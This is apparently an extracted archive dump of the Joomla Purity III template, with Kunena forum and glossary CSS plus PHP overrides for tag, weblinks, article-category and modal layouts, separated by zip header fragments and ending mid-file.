#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #00466e;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #00466e;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #0077bb;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 20px;
    padding-right: 20px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #0077bb;
  color: #0077bb;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #0077bb;
  border: 1px solid #0077bb;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #0077bb;
  color: #0077bb;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #0077bb;
  border-color: #0077bb;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\e^��qq)purity_iii/css/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #0077bb;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #0077bb;
  text-decoration: none;
}PKӜ�\�V�2purity_iii/html/mod_tags_popular/helper/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�#e�TT1purity_iii/html/mod_tags_popular/helper/route.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_tags
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Tags Component Route Helper
 *
 * @static
 * @package     Joomla.Site
 * @subpackage  com_tags
 * @since       3.1
 */
class JATagsHelperRoute extends TagsHelperRoute
{
	public static function getTagRoute($id)
	{
		$needles = array(
			'tag'  => array((int) $id)
		);
		if ($id < 1)
		{
			$link = '';
		}
		else
		{
			if (!empty($needles) && $item = self::_findItem($needles))
			{
				$link = 'index.php?Itemid=' . $item;
			}
			else
			{
				// detect tags page
				$app = JFactory::getApplication();
				$menus		= $app->getMenu('site');
				$component	= JComponentHelper::getComponent('com_tags');
				$items		= $menus->getItems('component_id', $component->id);
				$itemid = '';
				if ($items) {
					foreach ($items as $item) {
						if (isset($item->query) && isset($item->query['view']) && $item->query['view'] == 'tags') {
							$itemid = '&Itemid='.$item->id;
							break;
						}
					}
				}
				// Create the link
				$link = 'index.php?option=com_tags&view=tag&id=' . $id . $itemid;
			}
		}

		return $link;
	}
}PKӜ�\����22,purity_iii/html/mod_tags_popular/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_tags_popular
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<?php
JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php');
require_once (dirname(__FILE__).'/helper/route.php');
?>
<div class="tagspopular<?php echo $moduleclass_sfx; ?>">
<?php if (!count($list)) : ?>
	<div class="alert alert-no-items"><?php echo JText::_('MOD_TAGS_POPULAR_NO_ITEMS_FOUND'); ?></div>
<?php else : ?>
	<ul >
	<?php foreach ($list as $item) : ?>
	<li><?php $route = new TagsHelperRoute; ?>
		<a href="<?php echo JRoute::_(JATagsHelperRoute::getTagRoute($item->tag_id . '-' . $item->alias)); ?>">
			<?php echo htmlspecialchars($item->title); ?></a>
		<?php if ($display_count) : ?>
			<span class="tag-count badge badge-info">(<?php echo $item->count; ?>)</span>
		<?php endif; ?>
	</li>
	<?php endforeach; ?>
	</ul>
<?php endif; ?>
</div>
PKӜ�\"��||*purity_iii/html/mod_tags_popular/cloud.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_tags_popular
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$minsize	= $params->get('minsize', 1);
$maxsize	= $params->get('maxsize', 2);

JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php');
require_once (dirname(__FILE__).'/helper/route.php');
?>
<div class="tagspopular<?php echo $moduleclass_sfx; ?> tagscloud<?php echo $moduleclass_sfx; ?>">
<?php
if (!count($list)) : ?>
	<div class="alert alert-no-items"><?php echo JText::_('MOD_TAGS_POPULAR_NO_ITEMS_FOUND'); ?></div>
<?php else :
	// Find maximum and minimum count
	$mincount = null;
	$maxcount = null;
	foreach ($list as $item)
	{
		if ($mincount === null or $mincount > $item->count)
		{
			$mincount = $item->count;
		}
		if ($maxcount === null or $maxcount < $item->count)
		{
			$maxcount = $item->count;
		}
	}
	$countdiff = $maxcount - $mincount;

	foreach ($list as $item) :
		if ($countdiff == 0) :
			$fontsize = $minsize;
		else :
			$fontsize = $minsize + (($maxsize - $minsize) / ($countdiff)) * ($item->count - $mincount);
		endif;
?>
		<span class="tag">
			<a class="tag-name" style="font-size: <?php echo $fontsize.'em'; ?>" href="<?php echo JRoute::_(JATagsHelperRoute::getTagRoute($item->tag_id . '-' . $item->alias)); ?>">
				<?php echo htmlspecialchars($item->title); ?>
				<?php if ($display_count) : ?>
					(<?php echo $item->count; ?>)
				<?php endif; ?>
			</a>
		</span>
	<?php endforeach; ?>
<?php endif; ?>
</div>
PKӜ�\�V�+purity_iii/html/mod_tags_popular/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�F�[[9purity_iii/html/com_weblinks/categories/default_items.phpnu&1i�<?php

/**
 * @package     Joomla.Site
 * @subpackage  com_weblinks
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;

if (version_compare(JVERSION, '4', 'ge')) {
    abstract class WeblinksHelperRoute extends Joomla\Component\Weblinks\Site\Helper\RouteHelper{};
}


if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
    ?>
 <div class="com-content-categories__items">
        <?php foreach ($this->items[$this->parent->id] as $id => $item) :
            ?>
            <?php if ($this->params->get('show_empty_categories_cat') || $item->numitems || count($item->getChildren())) :
                ?>
         <div class="com-content-categories__item">
             <div class="w-100">
                    <a href="<?php echo Route::_(WeblinksHelperRoute::getCategoryRoute($item->id, $item->language)); ?>">
                        <?php echo $this->escape($item->title); ?></a>
                    <?php if ($this->params->get('show_cat_num_links_cat') == 1) :
                        ?>
                      <span class="badge bg-info ">
                                <?php echo Text::_('COM_WEBLINKS_NUM_ITEMS'); ?>&nbsp;
                                <?php echo $item->numitems; ?>
                        </span>
                        <?php
                    endif; ?>
                    <?php if ($this->maxLevelcat > 1 && count($item->getChildren()) > 0) :
                        ?>
                      <button
                                type="button"
                                id="category-btn-<?php echo $item->id; ?>"
                                data-category-id="<?php echo $item->id; ?>"
                               class="btn btn-secondary btn-sm float-end"
                             aria-expanded="false"
                                aria-label="<?php echo Text::_('JGLOBAL_EXPAND_CATEGORIES'); ?>"
                     >
                          <span class="icon-plus" aria-hidden="true"></span>
                     </button>
                        <?php
                    endif; ?>
              </div>

                <?php if ($this->params->get('show_subcat_desc_cat') == 1 && !empty($item->description)) :
                    ?>
                  <div class="category-desc">
                        <?php echo HTMLHelper::_('content.prepare', $item->description, '', 'com_weblinks.categories'); ?>
                 </div>
                    <?php
                endif; ?>

                <?php if ($this->params->get('show_description_image') && !empty($item->getParams()->get('image'))) :
                    ?>
                    <?php
                        $params = $item->getParams();
                    $img = HTMLHelper::cleanImageURL($params->get('image'));
                    $alt = '';
                    if (!empty($params->get('image_alt'))) :
                        $alt = 'alt="' . htmlspecialchars($params->get('image_alt'), ENT_COMPAT, 'UTF-8') . '"';
                    elseif (!empty($params->get('image_alt_empty'))) :
                        $alt = 'alt=""';
                    endif;
                    ?>
                    <img src="<?php echo htmlspecialchars($img->url, ENT_COMPAT, 'UTF-8'); ?>"<?php echo $alt; ?>>
                    <?php
                endif; ?>


                <?php if ($this->maxLevelcat > 1 && count($item->getChildren()) > 0) :
                    ?>
                    <div class="com-content-categories__children" id="category-<?php echo $item->id; ?>" hidden>
                        <?php
                        $this->items[$item->id] = $item->getChildren();
                        $this->parent = $item;
                        $this->maxLevelcat--;
                        echo $this->loadTemplate('items');
                        $this->parent = $item->getParent();
                        $this->maxLevelcat++;
                        ?>
                    </div>
                    <?php
                endif; ?>
         </div>
                <?php
            endif; ?>
            <?php
        endforeach; ?>
    </div>
    <?php
endif; ?>
PKӜ�\�V�2purity_iii/html/com_weblinks/categories/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�V�'purity_iii/html/com_weblinks/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\���221purity_iii/html/mod_articles_category/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_articles_category
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$moduleclass_sfx = $params->get('moduleclass_sfx','');
?>
<ul class="category-module<?php echo $moduleclass_sfx; ?>">
<?php if ($grouped) : ?>
	<?php foreach ($list as $group_name => $group) : ?>
	<li>
		<ul>
			<?php foreach ($group as $item) : ?>
				<li>
					<?php if ($params->get('link_titles') == 1) : ?>
						<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
						<?php echo $item->title; ?>
						</a>
					<?php else : ?>
						<?php echo $item->title; ?>
					<?php endif; ?>

					<?php if ($item->displayHits) : ?>
						<span class="mod-articles-category-hits">
						(<?php echo $item->displayHits; ?>)
						</span>
					<?php endif; ?>

					<?php if ($params->get('show_author')) :?>
						<span class="mod-articles-category-writtenby">
						<?php echo $item->displayAuthorName; ?>
						</span>
					<?php endif;?>

					<?php if ($item->displayCategoryTitle) :?>
						<span class="mod-articles-category-category">
						(<?php echo $item->displayCategoryTitle; ?>)
						</span>
					<?php endif; ?>

					<?php if ($item->displayDate) : ?>
						<span class="mod-articles-category-date"><?php echo $item->displayDate; ?></span>
					<?php endif; ?>

					<?php if ($params->get('show_introtext')) :?>
						<p class="mod-articles-category-introtext">
							<?php echo $item->displayIntrotext; ?>
						</p>
					<?php endif; ?>

					<?php if ($params->get('show_readmore')) :?>
						<p class="mod-articles-category-readmore">
						<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
						<?php if ($item->params->get('access-view') == false) :
							echo JText::_('MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE');
						elseif ($readmore = $item->alternative_readmore) :
							echo $readmore;
							echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit'));
								if ($params->get('show_readmore_title', 0) != 0) :
									echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
									endif;
						elseif ($params->get('show_readmore_title', 0) == 0) :
							echo JText::sprintf('MOD_ARTICLES_CATEGORY_READ_MORE_TITLE');
						else :
							echo JText::_('MOD_ARTICLES_CATEGORY_READ_MORE');
							echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit'));
						endif; ?>
						</a>
						</p>
					<?php endif; ?>
				</li>
			<?php endforeach; ?>
		</ul>
	</li>
	<?php endforeach; ?>
<?php else : ?>
	<?php foreach ($list as $item) : ?>
		<li>
			<?php if ($params->get('link_titles') == 1) : ?>
				<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
				<?php echo $item->title; ?>
				</a>
			<?php else : ?>
				<?php echo $item->title; ?>
			<?php endif; ?>

			<?php if ($params->get('show_author')) :?>
				<span class="mod-articles-category-writtenby">
					<?php echo $item->displayAuthorName; ?>
				</span>
			<?php endif;?>

			<?php if ($item->displayCategoryTitle) :?>
				<span class="mod-articles-category-category">
				(<?php echo $item->displayCategoryTitle; ?>)
				</span>
			<?php endif; ?>

			<?php if ($item->displayDate) : ?>
				<span class="mod-articles-category-date"><?php echo $item->displayDate; ?></span>
			<?php endif; ?>

			<?php if ($params->get('show_introtext')) :?>
				<p class="mod-articles-category-introtext">
				<?php echo $item->displayIntrotext; ?>
				</p>
			<?php endif; ?>

			<?php if ($params->get('show_readmore')) :?>
				<p class="mod-articles-category-readmore">
				<a class="mod-articles-category-title <?php echo $item->active; ?>" href="<?php echo $item->link; ?>">
					<?php if ($item->params->get('access-view') == false) :
						echo JText::_('MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE');
					elseif ($readmore = $item->alternative_readmore) :
						echo $readmore;
						echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit'));
					elseif ($params->get('show_readmore_title', 0) == 0) :
						echo JText::sprintf('MOD_ARTICLES_CATEGORY_READ_MORE_TITLE');
					else :
						echo JText::_('MOD_ARTICLES_CATEGORY_READ_MORE');
						echo JHtml::_('string.truncate', $item->title, $params->get('readmore_limit'));
					endif; ?>
				</a>
				</p>
			<?php endif; ?>
		</li>
	<?php endforeach; ?>
<?php endif; ?>
</ul>
PKӜ�\�V�0purity_iii/html/mod_articles_category/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�V�"purity_iii/html/layouts/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�v],,-purity_iii/html/layouts/joomla/modal/main.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

use Joomla\Utilities\ArrayHelper;

// Load bootstrap-tooltip-extended plugin for additional tooltip positions in modal
JHtml::_('bootstrap.tooltipExtended');

extract($displayData);

/**
 * Layout variables
 * ------------------
 * @param   string  $selector  Unique DOM identifier for the modal. CSS id without #
 * @param   array   $params    Modal parameters. Default supported parameters:
 *                             - title        string   The modal title
 *                             - backdrop     mixed    A boolean select if a modal-backdrop element should be included (default = true)
 *                                                     The string 'static' includes a backdrop which doesn't close the modal on click.
 *                             - keyboard     boolean  Closes the modal when escape key is pressed (default = true)
 *                             - closeButton  boolean  Display modal close button (default = true)
 *                             - animation    boolean  Fade in from the top of the page (default = true)
 *                             - url          string   URL of a resource to be inserted as an <iframe> inside the modal body
 *                             - height       string   height of the <iframe> containing the remote resource
 *                             - width        string   width of the <iframe> containing the remote resource
 *                             - bodyHeight   int      Optional height of the modal body in viewport units (vh)
 *                             - modalWidth   int      Optional width of the modal in viewport units (vh)
 *                             - footer       string   Optional markup for the modal footer
 * @param   string  $body      Markup for the modal body. Appended after the <iframe> if the URL option is set
 *
 */

$modalClasses = array('modal', '');

if (!isset($params['animation']) || $params['animation'])
{
	$modalClasses[] = 'fade';
}

$modalWidth = isset($params['modalWidth']) ? round((int) $params['modalWidth'], -1) : '';

if ($modalWidth && $modalWidth > 0 && $modalWidth <= 100)
{
	$modalClasses[] = 'jviewport-width' . $modalWidth;
}

$modalAttributes = array(
	'tabindex' => '-1',
	'class'    => implode(' ', $modalClasses)
);

if (isset($params['backdrop']))
{
